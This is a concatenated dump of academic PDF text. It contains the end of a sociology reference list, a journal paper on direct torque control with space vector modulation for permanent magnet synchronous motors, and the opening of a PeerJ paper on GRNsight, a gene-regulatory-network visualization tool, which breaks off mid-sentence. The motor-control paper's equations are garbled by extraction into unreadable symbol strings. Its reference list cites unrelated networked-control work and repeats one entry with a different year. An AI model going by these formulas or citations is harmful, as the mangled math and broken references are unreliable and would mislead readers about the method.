Carrington & J. Scott (Eds.), The SAGE handbook of social network analysis (pp. 404–416). London: SAGE. Hollstein, B. (2014). Mixed Methods Social Networks Research: An Introduction. In S. Domínguez & B. Hollstein (Eds.), Structural analysis in the social sciences: Vol. 36. Mixed methods social networks research. Design and applications (pp. 8–34). New York: Cambridge Univ. Press. Fowler. James H. (2006). Connecting the Congress: A Study of Cosponsorship Networks. Political Anal- ysis, (14), 456–487. Retrieved from 10.1093/pan/mpl002 Kahn, R. L., & Antonucci, T. C. (1980). Convoys of life course: Attachment, roles, and social support. In P. B. Baltes & O. G. Brim (Eds.), Life-span de- velopment and behavior (pp. 253–286). New York: Academic Press. Lin, N., Cook, K. S., & Burt, R. S. (2001). Social cap- ital: Theory and research. New York: Aldine de Gruyter. Retrieved from http://www.worldcat.org/oclc/45320849 McCarty, C., Killworth, P. D., & Rennell, J. (2007). Impact of methods for reducing respondent burden on personal network structural measures. Social Networks, 29(2), 300–315. doi:10.1016/j.socnet.2006.12.005 Ohm, A. (2009). Die Machtstruktur kommunaler Entscheidungsträger - Eine Netzwerkanalyse. In V. Schneider & F. Janning (Eds.), Politiknetzwerke. Modelle, Anwendungen und Visualisierungen (pp. 285–303). Wiesbaden: VS Verlag für Sozialwissenschaften. Petermann, S. (2008). Soziale Netzwerke und politischer Einfluss von Kommunalpolitikern. In W. Matiaske & G. Grözinger (Eds.), Sozialkapital. Eine (un)bequeme Kategorie (pp. 139–177). Marburg: Metropolis-Verlag. Pfenning, U., & Pfenning, A. (1987). Egozentrierte Netzwerke: Verschiedene Instrumente - verschiedene Ergebnisse. ZUMA Nachrichten, (21), 64–77. Retrieved from http://www.ssoar.info/ssoar/files/2011/393/zuma- nachrichten_1987_21_64-77.pdf Wellman, B., & Leighton, B. (1978). Networks, neighborhoods and communities: Approaches to the study of the community question. Toronto: Centre for Urban and Community Studies and the Dept. of Sociology, University of Toronto. Werner, W. (1998). Armut und Obdachlosigkeit in der Kommune. In H. Wollmann & R. Roth (Eds.), Kommunalpolitik – Politisches Handeln in der Gemeinde (2nd ed., pp. 703–716). Opladen: Westdeutscher Verlag. work_s6h3rwomgrfw3hvq5b7lfpywai ---- International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 100 The Research of Direct Torque Control Based on Space Vector Modulation Su Xiaohui , Chen Guodong and Xu Shuping School of Computer Science and Engineering, Xi’an Technological University, 710021 China Email: suxh666@163.com Abstract. In order to solve the conventional direct torque control contradiction between the dynamic and static performance ,a permanent magnet synchronous motor system direct torque control architecture is proposed based on space vector modulation strategy . In this method flux and torque are controlled through stator voltage components in stator fluxlinkage coordinate axes and space vector modulation is used to control inverters.The simulation verifies that SVM-DTCis capable of effectively improving the steady state performance and keeping the excellent dynamic performance of theconventional DTC system simultaneously and remain the switching frequency constant. Keywords: Simulation, Direct torque control, Space vector modulation. 1. Introduction Direct torque control (DTC) has been widely used in the field of control of permanent magnet synchronous motor (PMSM), because it has the advantages of simple structure and fast dynamic response of the torque, which has been paid more and more attention in recent years [1-3].Conventional direct torque control is based on the torque, flux hysteresis controller output and a 60° stator flux linkage angle based on the signal, according to certain rules from the prefabricated switch table select the appropriate space voltage vector on the motorTorque, flux linkage for Bang-Bang control [4].However, according to this way of selecting the voltage vector can not meet the system of torque and flux linkage of the double request, will have a larger torque and flux ripple [5].In addition, the conventional DTC method can cause the output of the hysteresis controller and the position of the stator flux linkage signal to be constant over multiple sampling periods, resulting in the same switch state of the inverter during these sampling periods, and thus the switching frequency of the system is changedNot constant, the capacity of the power device can not be fully utilized [6].Space Vector Modulation (SVM) is used to obtain the desired arbitrary voltage vector by combining adjacent effective voltage vector and zero- voltage vector in one sampling period, and the voltage vector is linearly adjustable [7]. 2. Space Vector Modulation Algorithm There are eight switching states for three-phase voltage source inverters, corresponding to six active voltage vectors: U1 (100), U2 (110), U3 (010), U4 (011), U5 (001), U6 (101 ) And two zero-voltage vectors U7 (000), U8 (111). Space vector modulation is applied to the motor is based on three-phase symmetrical sinusoidal voltage supply AC motor generated by the ideal circular flux trajectory as the The Research of Direct Torque Control Based on Space Vector Modulation 101 base, through the eight basic space voltage vector to the equivalent reference voltage vector so that the actual motor The air-gap trajectory approaches the ideal circle. As shown in Fig. 1, in the coordinate system, the first sector is used as an example to synthesize the reference vector with two adjacent voltage vectors U1, U2 and zero vectors U0 (U7 and U8). According to the volt-second balance principle: * 1 1 2 2 0 0 s sT T T T+ + =U U U U (1) Where, T1, T2, respectively U1, U2 role of time, T0 is zero vector of time, T5 for the PWM cycle. The meaning of formula (1) is that the integral effect produced by the vector in T5 time is the same as the integration effect of U1, U2 and zero vector U0. Figure.1 space voltage vector and sector (1) U1, U2 and in axis decomposition obtained:          −−= = −= 210 2 1 3 )33( 2 TTTT U U T T UU U T T s dc s dc s β βα (2) The amplitude of the fundamental voltage of the output voltage increases linearly with time, and the time T0 of the zero vector U0 decreases gradually, but the following relationship should be satisfied:    ≥ ≤+ 00 21 T TTT s (3) Similarly, in the remaining five sectors, the basic space voltage vector will change with the region of the corresponding changes. This allows SVM technology to synthesize any required space voltage vectors. Space vector modulation is to use a certain frequency (1 / Ts) and amplitude ( Ts / 2) of the equivalent time triangular wave to modulate A, B, C three-phase switching time Tcm1 , Tcm2 , Tcm3 ,that is, the modulation signal. From the basic modulation principle of SVM, the maximum linear range of SVM is the inscribed circle shown in Fig.1, that is, the space vector modulation in the inscribed circle is linear modulation, while the over-inscribed circle is overmodulation . The following simulation and International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 102 experimental analysis and comparison of different reference voltage vector in the case, SVM modulation signal and output line voltage waveform and the relationship between. 3. Dynamic Control of Stator Flux Linkage Figure 2 depicts the relationship between the stator flux linkage and the space voltage vector in the motor operation and the relationship between the stator flux in a single sampling period T5Dynamic control process stator flux. Figure.2 flux linkage diagram In Fig. 2, the phase angle sγ of the stator flux vector sø at the present moment can be estimated by the flux estimator in the stator two-phase stationary coordinate system αβ ,If the control system gives the reference flux linkage * sø with the phase angle * sγ , the stator flux linkage δ∆ angle ahead of the current time, if the actual flux vector arrives at the reference flux linkage at the next sampling time, a space voltage vector * sU as shown in the figure should be applied in the time period of the sampling period T5, the reason for this is that the magnitude and phase angle of the applied space voltage vector U5 * can be calculated from equations (4) ~ (7) by moving the end points of the flux vector in the direction of the applied space voltage vector. * * * cos( ) cos cos( ) coss s s s s s s s s s s s s U R i T Tα α γ δ γ γ δ γ+ ∆ − + ∆ − = + ≈ øøøø (4) * * * sin( ) sin sin( ) sins s s s s s s s s s s s s U R i T Tβ β γ δ γ γ δ γ+ ∆ − + ∆ − = + ≈ øøøø (5) * * 2 * 2 s s sU Uα β= +U (6) * * *arctan( / )s s sU Uβ αϕ = (7) Where *sU α and * sU β are the components of the reference voltage vector * sU in the two-phase stationary coordinate system αβ , respectively, * sU and *sϕ , respectivelyis the amplitude and phase angle of * sU . The stator flux vector magnitude and phase angle, torque can be calculated by the following formula: The Research of Direct Torque Control Based on Space Vector Modulation 103     −= −= ∫ ∫ dtiRu dtiRu ssss ssss )( )( βββ ααα ψ ψ (8) 2 2 s s sα βψ ψ ψ= + (9) )/arctan( αβ ψψγ sss = (10) )( 2 3 αββα ψψ sssspe iiNT −= (11) The subscripts α and β are the components of each physical quantity on the αβ -axis of the stator two-phase stationary coordinate system. 4. Direct Torque Control of Space Vector Modulation The structure diagram of the direct torque control system (SVM-DTC) of permanent magnet synchronous motor based on space vector modulation is shown in Fig.3, Where the reference flux calculation model element and the space voltage vector modulation element SVM replaces the flux linkage in a conventional DTCand a torque hysteresis controller and switch table. Figure.3 SVM-DTC block diagram of the structure In Fig. 3, the difference between the reference angular velocity * sω and the feedback angular velocity ω is output to the reference torque command *eT via a PI regulator.As the steady-state stator flux rotation speed and the rotor speed of rotation is the same, that is, synchronous speed ω , and when the reference torque or load torque in the dynamic process of mutation, the two speeds will be significantly inconsistent, the stator the flux rotation speed is significantly faster than the rotor rotation speed, there is a difference between the two rotational speed difference sω∆ .Thus, the difference between the reference torque * eT and the estimated torque eT can be output by a PI regulator, which is the stator flux rotational speed increment sω∆ ,to reflect the dynamic change of the torque in real time.Thus, the total rotational speed * sω of the flux linkage in one sampling period can be determined by the steady-state rotation speed ω and the rate of changeOf the rotational speed difference sω∆ , that is, the system should be in dtd /θ *ω ω + - + AS BS CS θ Encoder PMSM VSISVM fl ux and torque esti mate e T * eT - dcU PI flux model reference * sψ sγ ω  + - sψ * sψ 1 sT sψ∆  * sUPI + + sω∆ *sω ABCi International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 104 the next sampling period given the flux reference speed.After obtaining the total flux rotation speed * sω , the reference flux vector * sø given in the next sampling period can be obtained by referring to the flux linkage calculation model.The reference flux vector * sø and the estimated flux vector sø of the current time can be calculated in the next sampling cycle should be applied to the space voltage vector * sU , space voltage vector * sU and then through the space voltage vector modulation unit SVM to generate PWM pulse signal AS , BS and CS , the final control voltage source inverter VSI drive permanent magnet synchronous motor.This new structure has the following advantages: PI regulator parameter adjustment is easy, and will not make the entire control system is running difficult.The product δ∆ of the stator flux angle at the next time can be obtained by multiplying the flux rotation speed * sω and the sampling period T5. Therefore, it is possible to adjust T5 todetermine δ∆ , which is easy to implement in the actual system. 5. Simulation Analysis The SVM-DTC control of permanent magnet synchronous motor (PMSM) based on the above- mentioned principle is established by Matlab / Simulink simulation softwareSystem model.The simulation motor parameters are: UN = 220v; NP = 4; Rs = 2.875 ohms; Ld = 8.5mH; Lq = 8.5mH;F = 0.175Wb.Specific simulation conditions are set to: no-load start, the initial speed 1200r / min, 0.1s step to 1400 r / min,The load was applied to the 2 N • m at 0.2 s. Figures 4 to 6 show the performance comparison of the conventional DTC and SVM-DTC simulation results, respectively.As can be seen from the figure,The response time of this control system is very short, almost no overshoot, which is the direct torque control of the outstanding advantages.From the torqueWaveform, the control mode of dynamic response is very fast, steady-state SVM-DTC torque fluctuations more stable, which canIt is seen from the current waveform that the current waveform of the SVM-DTC is closer to the sine wave than the conventional DTC current waveform.These differences is that the conventional DTC can only be controlled by selecting six basic active space voltage vectors and a hysteresis controller and SVM-DTC can use SVM to arbitrarily linearly combine the required space voltage vector to by real-time sampling calculation can be more precise control of the stator flux linkage. (a) Conventional DTC velocity response curve (b) SVM-DTC velocity response curve Figure .4 two kinds of control speed response curve The Research of Direct Torque Control Based on Space Vector Modulation 105 (a) Conventional DTC torque response curve (b)SVM-DTC torque response curve Figure.5 two kinds of control torque response curve (a)Conventional DTC Phase Current Curves (b)SVM-DTC phase current curve Figure.6 two kinds of control phase current curve Torque Figure 7 for the SVM-DTC control process of the motor torque angle δ waveform of the change, we can see that the torque angle is electromagnetic torque changes consistent.In most steady- state processes, the torque angle δ is in the vicinity of a fixed value to do a small wave and the torque angle also changes rapidly in the dynamic process of rapid torque change. Figure.7 Torque angle δ curve International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 106 6. Conclusion In order to solve the contradiction between dynamic and static performance of conventional direct torque control, that is, the contradiction between torque, fast response of flux linkage and torque, and large steady-state pulsation of flux linkage, this paper proposes a space vector based on space vector (PMSM) direct torque control (SVM-DTC), the principle and implementation of the scheme are discussed in detail. It is pointed out that the conventional DTC can only control the motor torque and flux linkage with a limited basic voltage vector, but none of the basic space voltage vectors can completely compensate the flux and torque errors in the system at the same time. Vector Modulation (SVM) is a promising solution. Secondly, the basic principle of SVM is expounded briefly. The SVM algorithm under different reference voltage vector input is analyzed, simulated and experimented. The SVM algorithm and its application are discussed in detail. Implementation has a clearer understanding. Finally, the SVM-DTC is discussed in detail, including the structure of the control system, the dynamic control process of the stator flux vector, the method of flux and torque estimation and the calculation model of the reference flux, etc. Theoretically, And the best compensation principle of flux error. Finally, the realization of SVM-DTC is studied, and compared with conventional DTC, the correctness of the control strategy is verified. Simulation results show that compared with conventional direct torque control, SVM-DTC has the advantages of faster dynamic response of conventional DTC and more stable steady-state operation while keeping the switching frequency of power devices constant. Because SVM-DTC has low hardware requirements and good control performance, it can effectively solve the contradiction between dynamic and static performance of conventional DTC, so it has good application prospects. Acknowledgment The authors wish to thank the cooperators. This research is partially funded by the Project funds in shaanxi province department of education (15JF019) and the Project funds in shanxi province department of science industrial projects(2015GY067). References [1] Zhang Wei, Michael S,Branicky, Stephen M, Phillips,Stability of Networked Control Systems, IEEE Control Systems Magazine1 February 2001, (21)：84-99. [2] Goodwin C, Juan Carlos Aguero,ArieFeuer, State Estima2tion for Systems Having Random Measurement Delays UsingErrors in Variables, The 15th Triennial World Congress1Barcelona,Spain, 2002. [3] Lee Kyung Chang,Lee Suk, Remote Controller Design of Networked Control System Using Genetic Algorithm, ISIE 2007，Pusan，KOREA in IEEE, 2007: 1845-1850. [4] AlmutairiNaif B，Chow Moyuen, PI Parameterization Using Adaptive Fuzzy Modulation (AFM) for Networked Control Systems - Part I : Partial Adaptation [J],IEEE Proceedings of IECON 2008,Sevilla，Spain，2008. 3152-3157. The Research of Direct Torque Control Based on Space Vector Modulation 107 [5]Huang J Q , Lew is FL, Liu K A, Neural predictive control for telerobotswith time delay [J]. Journal of Intelligent and Robotic System s, 2000, 29：1- 25. [6]Lian Fengli1 Analysis, Design, Modeling,and Control of Networked Control Systems, Ph.D. thesis,The University of Michigan,2001. [7] Huang J Q , Lew is FL, Liu K A, Neural predictive control for telerobotswith time delay [J]. Journal of Intelligent and Robotic System s, 2008, 29：1- 25. About the Author Su xiaohui, (1970-11), male (the Han nationality), Shaanxi Province, Working in Xi’an technological university, Vicect professor, the research area is computer control. Correspondence Address (School of Computer Science and Engineering , Xi’an Technological University) Postal Code: 710021 Tel: 13759907360 Email: suxh666@163.com work_s6nrg5wnavdkrjcrx45chwcn2a ---- GRNsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks GRNsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks Kam D. Dahlquist1, John David N. Dionisio2, Ben G. Fitzpatrick3, Nicole A. Anguiano2, Anindita Varshneya1, Britain J. Southwick2 and Mihir Samdarshi1 1 Department of Biology, Loyola Marymount University, Los Angeles, California, United States 2 Department of Electrical Engineering and Computer Science, Loyola Marymount University, Los Angeles, California, United States 3 Department of Mathematics, Loyola Marymount University, Los Angeles, California, United States ABSTRACT GRNsight is a web application and service for visualizing models of gene regulatory networks (GRNs). A gene regulatory network (GRN) consists of genes, transcription factors, and the regulatory connections between them which govern the level of expression of mRNA and protein from genes. The original motivation came from our efforts to perform parameter estimation and forward simulation of the dynamics of a differential equations model of a small GRN with 21 nodes and 31 edges. We wanted a quick and easy way to visualize the weight parameters from the model which represent the direction and magnitude of the influence of a transcription factor on its target gene, so we created GRNsight. GRNsight automatically lays out either an unweighted or weighted network graph based on an Excel spreadsheet containing an adjacency matrix where regulators are named in the columns and target genes in the rows, a Simple Interaction Format (SIF) text file, or a GraphML XML file. When a user uploads an input file specifying an unweighted network, GRNsight automatically lays out the graph using black lines and pointed arrowheads. For a weighted network, GRNsight uses pointed and blunt arrowheads, and colors the edges and adjusts their thicknesses based on the sign (positive for activation or negative for repression) and magnitude of the weight parameter. GRNsight is written in JavaScript, with diagrams facilitated by D3.js, a data visualization library. Node.js and the Express framework handle server-side functions. GRNsight’s diagrams are based on D3.js’s force graph layout algorithm, which was then extensively customized to support the specific needs of GRNs. Nodes are rectangular and support gene labels of up to 12 characters. The edges are arcs, which become straight lines when the nodes are close together. Self-regulatory edges are indicated by a loop. When a user mouses over an edge, the numerical value of the weight parameter is displayed. Visualizations can be modified by sliders that adjust the force graph layout parameters and through manual node dragging. GRNsight is best-suited for visualizing networks of fewer than 35 nodes and 70 edges, although it accepts networks of up to 75 nodes or 150 edges. GRNsight has general applicability for displaying any small, unweighted or weighted network with directed edges for systems biology or other application domains. GRNsight serves as an example of following and teaching best practices for scientific computing and complying with FAIR principles, using an open and test-driven development model How to cite this article Dahlquist et al. (2016), GRNsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks. PeerJ Comput. Sci. 2:e85; DOI 10.7717/peerj-cs.85 Submitted 21 May 2016 Accepted 20 August 2016 Published 12 September 2016 Corresponding author Kam D. Dahlquist, kdahlquist@lmu.edu Academic editor Shawn Gomez Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.85 Copyright 2016 Dahlquist et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.85 mailto:kdahlquist@�lmu.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.85 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ with rigorous documentation of requirements and issues on GitHub. An exhaustive unit testing framework using Mocha and the Chai assertion library consists of around 160 automated unit tests that examine nearly 530 test files to ensure that the program is running as expected. The GRNsight application (http://dondi.github.io/ GRNsight/) and code (https://github.com/dondi/GRNsight) are available under the open source BSD license. Subjects Bioinformatics, Graphics, Software Engineering Keywords Gene regulatory networks, Visualization, Web application, Web service, Automatic graph layout, Best practices for scientific computing, FAIR principles, Open source, Open development INTRODUCTION GRNsight is a web application and service for visualizing models of small- to medium- scale gene regulatory networks (GRNs). A gene regulatory network (GRN) consists of genes, transcription factors, and the regulatory connections between them which govern the level of expression of mRNA and protein from genes. Our group has developed a MATLAB program to perform parameter estimation and forward simulation of the dynamics of an ordinary differential equations model of a medium-scale GRN with 21 nodes and 31 edges (Dahlquist et al., 2015; http://kdahlquist.github.io/GRNmap/). GRNmap accepts a Microsoft Excel workbook as input, with multiple worksheets specifying the different types of data needed to run the model. For compactness, the GRN itself is specified by a worksheet that contains an adjacency matrix where regulators are named in the columns and target genes in the rows. Each cell in the matrix contains a “0” if there is no regulatory relationship between the regulator and target, or a “1” if there is a regulatory relationship between them. The GRNmap program then outputs the estimated weight parameters in a new worksheet containing an adjacency matrix where the “1’s” are replaced with a real number that is the weight parameter, representing the direction (positive for activation or negative for repression) and magnitude of the influence of the transcription factor on its target gene (Dahlquist et al., 2015). Although MATLAB has graph layout capabilities, we wanted a way for novice and experienced biologists alike to quickly and easily view the unweighted and weighted network graphs corresponding to the matrix without having to create or modify MATLAB code. Given that our user base included students in courses using university computer labs where the installation and maintenance of software is subject to logistical considerations sometimes beyond our control, we enumerated the following requirements for a potential visualization tool. The tool should: 1. Exist as a web application without the need to download and install specialized software; 2. Be simple and intuitive to use; 3. Accept an input file in Microsoft Excel format (.xlsx); 4. Read a weighted or unweighted adjacency matrix where the regulatory transcription factors are in columns and the target genes are in rows; Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 2/24 http://dondi.github.io/GRNsight/ http://dondi.github.io/GRNsight/ https://github.com/dondi/GRNsight http://kdahlquist.github.io/GRNmap/ http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ 5. Automatically lay out and display small- to medium-scale, unweighted and weighted, directed network graphs in a way that is familiar to biologists and adds value to the interpretation of the modeling results. Having established the broad technical requirements to which we were seeking a solution, the first task was to determine if software already existed that could fulfill our needs. A review by Pavlopoulos et al. (2015), describes the types, trends, and usage of visualization tools available for genomics and systems biology. Their list of 47 tools for network analysis is representative of what was available to us at our project inception in January 2014 (given the caveat that the list itself is a moving target with some tools dropping out, new ones being added, and others evolving in their functions). With such a large number of tools available, it would be reasonable to expect that one already existed that could fulfill our needs. However, our use case was narrow, and the tools we investigated out of this diverse set each had properties that limited their use for us. With regard to our first requirement, out of the 47 tools, 29 are stand-alone applications, requiring installation, versus 18 web applications. With respect to our second requirement, the more complex software packages out of the set have a steep learning curve. Our third and fourth requirements specify data types. Some packages were hardcoded for a different type of network than a GRN (e.g., metabolic or signaling pathways, protein-protein interaction networks) or retrieved data exclusively from a backend database, not allowing user-supplied data. None at the time would readily accept an adjacency matrix with the GRNmap specifications as input without some manipulation of the data format. Finally, with respect to the last requirement, the core functionality, some packages were designed for visualization and analysis of much larger networks than the ones in which we were interested or did not have the ability to display directed, weighted graphs. As an illustration of this, Pavlopoulos et al. (2015) showed that the open source software, Cytoscape (Shannon et al., 2003; Smoot et al., 2011) had the highest citation count in the Scopus database, as it is widely recognized as the “best-in-class” tool for viewing and analyzing large networks for systems biology research. However, while Cytoscape is flexible in terms of what types of network representations it accepts as input (SIF, NNF, GML, XGMML, SBML, BioPAX, PSI-MI, GraphML, cf. http:// manual.cytoscape.org/en/latest/Supported_Network_File_Formats.html#supported- network-file-formats), its basic “unformatted table files” format expects the network to be represented in a list of pairwise interactions between two nodes instead of as an adjacency matrix, requiring a GRNmap user to convert the file external to the program. Furthermore, Cytoscape must be installed on a user’s computer. Finally, because it is powerful and has a lot of features, there is a somewhat steep learning curve before a novice user can begin to visualize networks. Multiple settings must be learned and selected to generate a display that properly fits a use case; it is not possible to just “load into Cytoscape and go.” Another open source application, Gephi (Bastian, Heymann & Jacomy, 2009), is a general graph visualization tool that does accept an adjacency matrix in .csv format (among a wide range of supported formats, Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 3/24 http://manual.cytoscape.org/en/latest/Supported_Network_File_Formats.html#supported-network-file-formats http://manual.cytoscape.org/en/latest/Supported_Network_File_Formats.html#supported-network-file-formats http://manual.cytoscape.org/en/latest/Supported_Network_File_Formats.html#supported-network-file-formats http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ cf. https://gephi.org/users/supported-graph-formats/csv-format/), but again requires download and installation of the software and has a complex feature set. Because GRNmap itself is complex software targeted both at experienced biology investigators and novice undergraduate users in a Biomathematical Modeling course, we wanted to limit the need to install and learn additional visualization software. Reducing the cognitive load required for using the software would allow users to focus their attention on understanding the biological results of the model. After this exploration, we decided to create our own software solution that we could exactly tailor to our specifications. Following the philosophy of “do one thing well” (http://onethingwell.org/post/457050307/about-one-thing-well), we wanted to prioritize rendering small- to medium-scale GRNs both easily and well. It was more important for us to create a tool that is specifically tailored to the visualization of these sized GRNs, and not every possible graph from every possible application domain. Similarly, we wanted to pass data seamlessly from GRNmap to GRNsight, while bearing in mind that we should adopt practices that would also make our tool useful to users outside our own group. Finally, we wanted to minimize any startup, onboarding, or overhead time, which necessitated also enumerating a set of process requirements that would lead us to our goal. Our project should: � Follow best practices for open software development in bioinformatics, including: reusing code, releasing early and often to a public repository, tracking requirements, issues, and bugs, performing unit-tests, and providing both code and user documentation (Schultheiss, 2011; Prli�c & Procter, 2012; Wilson et al., 2014); � Leverage the expertise of the faculty and undergraduate student development team members and be responsive to our GRNmap customers (i.e., eat our own dog food); � Balance the needs of fulfilling our own use case with developing a tool of wider applicability to the scientific community during a development cycle that ebbs and flows with the pressures of the academic calendar. GRNsight both fulfills our stated product requirements and serves as a model for best practices for software development in bioinformatics as discussed in the sections below. MATERIALS AND METHODS Input data GRNsight automatically lays out the network graph specified by an adjacency matrix contained within a worksheet named “network” or “network_optimized_weights” in a Microsoft Excel workbook (.xlsx). It was designed to accept workbooks seamlessly from the MATLAB GRN modeling program, GRNmap; however, the expected input format is general and is not dependent on GRNmap. Detailed documentation for the expected input file format is found on the GRNsight Documentation page: http://dondi.github.io/ GRNsight/documentation.html. GRNsight can automatically lay out either an unweighted or weighted network graph specified by an adjacency matrix where regulators are named in the columns and target Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 4/24 https://gephi.org/users/supported-graph-formats/csv-format/ http://onethingwell.org/post/457050307/about-one-thing-well http://dondi.github.io/GRNsight/documentation.html http://dondi.github.io/GRNsight/documentation.html http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ genes in the rows. Note that regulators (regulatory transcription factors) are themselves encoded by genes and will be referred to as such. The adjacency matrix can be either symmetric (with the exact same genes named in both the columns and rows) or asymmetric (additional genes in either the columns or rows or both). For an unweighted network, each cell in the matrix should contain a “0” if there is no regulatory relationship between the regulator and target, or a “1” if there is a regulatory relationship between them (Fig. 1). In a weighted network, the “1’s” are replaced with a real number that is the weight parameter (Fig. 2). Positive weights indicate activation of the target gene by the regulator, and negative weights indicate repression of the target gene by the regulator. After having implemented the core functionality of seamlessly reading GRNmap- generated Excel workbooks, we recently extended the ability of GRNsight to read other commonly used network data formats to increase the interoperability of GRNsight with other network analysis and visualization software. GRNsight can import and display Simple Interaction Format (SIF, .sif, http://manual.cytoscape.org/en/latest/ Supported_Network_File_Formats.html#sif-format) and GraphML (.graphml; Brandes et al., 2001; http://graphml.graphdrawing.org/) files and export network data in those two formats (see the GRNsight Documentation page for details of the implementation at http://dondi.github.io/GRNsight/documentation.html). GRNsight is designed to visualize small- to medium-scale GRNs, not the entire GRN for an organism. The bounding box for display of the graph has a fixed size. Currently, it is recommended that the user upload networks with no more than 35 unique genes (nodes) or 70 edges. A warning is given upon upload of a network with 50–74 nodes or 71–99 edges, although the network graph will still display. If the user attempts to upload a network of 75 or more nodes or 100 or more edges, the graph does not display, and an error message will be returned. Architecture GRNsight has a service-oriented architecture, consisting of separate server and web client components (Fig. 3). The server provides a web application programming interface (API) that accepts a Microsoft Excel workbook (.xlsx) file via a POSTrequest and converts it into a corresponding JavaScript Object Notation (JSON) representation. Conversion is accomplished by first parsing the .xlsx file using the node-xlsx library (https://github. com/mgcrea/node-xlsx) then mapping the translated worksheet cells into JSON. It also provides demonstration graphs already in this JSON format, without requiring a spreadsheet upload. The web client provides a graphical user interface for visualizing the JSON graphs returned by the server, whether the graphs are parsed from uploaded Excel workbooks or returned directly by the server’s demos. As an additional layer of customization, the graphical interface provided by the web client can be embedded in any web page using the standard iframe element. This is the mechanism used in deploying the production and beta versions of the software on http://dondi.github.io/GRNsight. Figure 3 illustrates this architecture and the interactions of the components. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 5/24 http://manual.cytoscape.org/en/latest/Supported_Network_File_Formats.html#sif-format http://manual.cytoscape.org/en/latest/Supported_Network_File_Formats.html#sif-format http://graphml.graphdrawing.org/ http://dondi.github.io/GRNsight/documentation.html https://github.com/mgcrea/node-xlsx https://github.com/mgcrea/node-xlsx http://dondi.github.io/GRNsight http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Documentation for how GRNsight is specifically deployed, including autonomous production and beta versions, can be found on the GRNsight wiki (https://github.com/ dondi/GRNsight/wiki/Server-Setup). Figure 1 Screenshot of the expected format for an adjacency matrix for an unweighted network. Regulators are named in the columns and target genes in the rows. A gene name at the top of the matrix will be considered the same as a gene name on the side if it contains the same text string, regardless of capitalization. The cells in the matrix contain a “0” if there is no regulatory relationship between the regulator and target, or a “1” if there is a regulatory relationship between them. This screenshot was generated from one of the demonstration files provided in the GRNsight user interface, Demo #3: Unweighted GRN (21 genes, 31 edges), first discussed in Dahlquist et al. (2015). Figure 2 Screenshot of the expected format for an adjacency matrix for a weighted network. Regulators are named in the columns and target genes in the rows. A gene name at the top of the matrix will be considered the same as a gene name on the side if it contains the same text string, regardless of capitalization. The cells in the matrix contain a “0” if there is no regulatory relationship between the regulator and target. If there is a relationship, the weight parameter is provided as a real number. Positive weights indicate activation of the target gene by the regulator, and negative weights indicate repression of the target gene by the regulator. This screenshot was generated from one of the demonstration files provided in the GRNsight user interface, Demo #4: Weighted GRN (21 genes, 31 edges; Schade et al., 2004 data), and displays weight parameters output by the GRNmap modeling software, first discussed in Dahlquist et al. (2015). Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 6/24 https://github.com/dondi/GRNsight/wiki/Server-Setup https://github.com/dondi/GRNsight/wiki/Server-Setup http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ GRNsight is an open source project and is itself built using other open source software. Server-side components are implemented with Node.js and the Express framework (Brown, 2014). Graph visualization is facilitated by the Data-Driven Documents JavaScript library (D3.js; Bostock, Ogievetsky & Heer, 2011). D3.js provides data mapping and layout routines which GRNsight heavily customizes in order to achieve the desired graph visualization. The resulting graph is a Scalable Vector Graphics (SVG) drawing in which D3.js maps gene objects from the JSON representation provided by the web API server onto labeled rectangles. Edge weights are mapped into Bezier curves. The resulting graph is interactive, initially using D3.js’s force graph layout algorithm to automatically determine the positions of the gene rectangles. The user can then drag the rectangles to improve the graph’s layout. Customizations to the graph display are described further in the next section. As noted in the Introduction, we decided to create our own GRNsight software instead of utilizing prior existing network visualization packages, like Cytoscape (Shannon et al., 2003; Smoot et al., 2011). However, in keeping with open source development practices, we did leverage other pre-existing code as described above. Besides D3.js, Cytoscape.js (Franz et al., 2016) has been developed as an open source network visualization engine. The BioJS registry (Yachdav et al., 2015) also lists a dozen components tagged with the keyword “network.” The choice of D3.js as the visualization engine was made simply to leverage the expertise of one of the co-authors who was already familiar with the D3.js library in order to minimize the startup, onboarding, and overhead time for the project, which initially served as a semester-long capstone experience for one of the undergraduate co-authors. Graph customizations GRNsight’s diagrams are based on D3.js’s force graph layout algorithm (Bostock, Ogievetsky & Heer, 2011), which was then extensively customized to support the specific needs of biologists GRNsight web API server GRNsight web application server embedded graphical user interface web browser host web page GUI resources graph in JSON format Excel, SIF, GraphML open/import cycle export cycle SIF, GraphML graph in JSON format Figure 3 GRNsight architecture and component interactions. The server provides a web API that accepts files in Microsoft Excel workbook (.xlsx), SIF (.sif), and GraphML (.graphml) formats and converts them into a unified JSON representation. A converse import function accepts this JSON representation and converts it into either SIF (.sif) or GraphML (.graphml) formats. The web appli- cation server provides code and resources for the graphical user interface that displays this JSON representation of the graph. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 7/24 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ for GRN visualization. D3.js’s baseline force graph implementation had round, unlabeled nodes and undirected, straight-line edges. The following customizations were made for the nodes: (a) the nodes were made rectangular; (b) a label of up to 